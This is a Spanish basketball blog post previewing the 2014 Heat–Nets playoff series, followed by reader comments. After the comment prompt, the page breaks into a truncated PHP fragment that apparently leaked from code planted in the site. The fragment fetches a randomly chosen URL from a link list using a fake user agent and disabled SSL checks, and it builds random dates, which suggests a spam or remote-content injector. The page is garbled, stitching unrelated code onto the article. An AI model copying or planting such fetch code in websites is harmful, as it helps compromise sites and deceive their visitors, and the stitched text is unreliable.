PO 2014: Previa Miami Heat – Brooklyn Nets

06 de May de 2014 por TheDeerHunter

lebron pierce

La última vez que LeBron James fue eliminado en semifinales de conferencia fue vistiendo la camiseta de Cavaliers. Concretamente, fue el año 2010, justo cuando le tocaba deshojar la margarita y que terminó con sus huesos en Miami. No se puede saber si LeBron hubiera tenido valor para abandonar Cleveland con un título recién ganado, pero todo parece indicar que aquella eliminación cambió la historia del baloncesto.

Echando la vista atrás resulta divertido encontrar algunos viejos conocidos como protagonistas. Pierce y Garnett, con su ahora rival Allen y el viejo Doc preparando el bombazo del año. Muchos recordaréis que a aquellos Celtics, a la postre subcampeones, se les daba por acabados. Nadie apostaba por ellos, y en ese sentido no se diferencia mucho de la serie que se avecina. Quizá los analistas de la ESPN no deberían olvidar aquel epic-fail del 2010. Por cierto, Garnett y Pierce firman un 12-13 en las 25 ocasiones que se han topado con “The Chosen One”. No creo que haya nadie que salga mejor parado en esa foto.

Por estos lares hay mucha gente que apuesta por la sorpresa, al menos desde el deseo. Conviene tener en cuenta que los campeones han perdido todos los enfrentamientos previos de este curso. Y no se puede trazar un patrón porque los Nets han sabido ganarles a más de 100 y a menos de 90. Algunos comentan que los Nets logran sobremotivarse contra su próximo rival, pero LeBron tampoco es de los que olvidan viejas afrentas.

Lo cierto es que no resulta fácil explicar ese momentáneo éxito de Brooklyn frente a Miami, porque aparentemente son una copia “algo regulera” de los campeones. Logran superarles por poco en rebotes al peor equipo de la competición, pero pierden en todo lo demás, incluido un small-ball del que los Heat se han hecho maestros.

Claves de la eliminatoria:

  • El despertar de la siesta: Tras ese “simulacro de eliminatoria”, como lo definíais alguno, no hemos visto en ningún momento algo parecido a los Heat pistando el acelerador. No es nada fácil sacar a relucir la vena competitiva de un día para otro. Ojalá los Nets estén en condiciones de obligarles a mostrar su cara más potente.
  • nets heat¿Otra vez tú por aquí?: Con las vueltas que da la vida y vamos a volver a disfrutar de un enfrentamiento directo entre LeBron y Pierce. A priori puede parecer un abuso, pero Pierce es una leyenda logrando extraer petróleo de la nada. También podemos nombrar el reencuentro de Ray Allen con sus ex compañeros. No me acuerdo si terminaron demasiado bien.
  • El blues de Jason Kidd: Posiblemente la mejor baza que tienen los Nets a su favor es el control del tempo, lento como una película de Tarkovsky. Les ha funcionado francamente bien contra Toronto, así que vienen entrenados. Digo la mejor, pero posiblemente sea su única baza.
  • Al poste, que es gerundio: LeBron es uno de los mejores jugadores al poste de la historia (entre otras facetas) pero los Nets también le han cogido el gustillo. Tanto Joe Johnson (en caso que no le marque el coco), como Livingston, como otros, tienen facilidad para explotar esa jugada.
  • Trata de arrancarlo, Bosh: Previsiblemente esta va a ser la serie más plácida para Chris Bosh, o la menos difícil… exceptuando los días que Al Jefferson andaba cojo o directamente no jugaba. Está obligado a destacar. No tendrá otra como ésta.
  • El imperio de Prokhorov contraataca: El pastizal invertido por el magnate ruso sale a relucir ahora. La rotación de los Nets es un arma temible. 11 jugadores han promediado más de 10 minutos en la pasada serie. Todos han aportado algo para llegar aquí. El desgaste de los 7 partidos no debería de pasar factura.

Pronóstico: Con todo, no me han impresionado los Nets a pesar de su (para mí) inesperada victoria contra unos inocentes Raptors. LeBron no caerá este año en semifinales. 4-1 Heat, siendo “optimista”.

Comenta

6 comentarios a esta entrada

  1. Nacho dice:
    #1

    Ufff, no se puede poner ningún pero al análisis, a las claves, ni incluso al pronóstico. Pero es que yo soy de los que desde hace tiempo cree que los Nets jugarán las Finales. Son sensaciones, y lo pienso desde después del AllStar. Muchos jugadores ante su última oportunidad, jugadores y entrenador masacrados por todo el mundo en la primera parte de la temporada, el recién importado corazón de campeón (este año estos Nets son más Celtics que los propios Celtics), no sé, me da el pálpito (y también el deseo)
    4/2 Nets.

      Citar

  2. Lucho dice:
    #2

    Heat 4-3 para mi

      Citar

  3. Lucho dice:
    #3

    “Este año los Nets son más Celtics que los propios Nets”
    Me encantó

      Citar

  4. HisRoyalAirness dice:
    #4

    Pues yo voy a ponerte un pero Deer, desde mi humilde opinión: de los mejores de la historia al poste? Supongo que hablando de un top 15-20.
    Por lo demás genial, como siempre

      Citar

  5. Esteban dice:
    #5

    por el contrario, no veo james como buen jugador al poste, mas que nada por que no quiere hacerlo, no por que no pudiera, pero es que no le gusta ir hacia alli

    pocas veces lo vi jugar al poste, ahora recuerdo como masacro a George en algun momento cuando este le habia encontrado la mano lejos del canasto

      Citar

  6. GreenPride dice:
    #6

    Eliminatoria clara para Miami a pesar de que a los de corazón verde como yo nos gustaría que Pierce y Garnett se comieran a LeBron. Pero aquellos tiempos ya pasaron y aunque los Nets pueden ser peligrosos no les veo ganando 4 partidos a los Heat ni en sus mejores sueños. Tendrán que agarrarse a un ritmo lo más lento posible pero ni su defensa es la de aquellos Celtics y ni Pierce y Garnett son ya los jugadores que fueron. Deron tendrá que destacar mucho sobre Chalmers y JoJo deberá hacer la serie de su vida para que tengan alguna pequeña opción. Para mí difícil que se llegue al sexto aunque me encantaría equivocarme.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>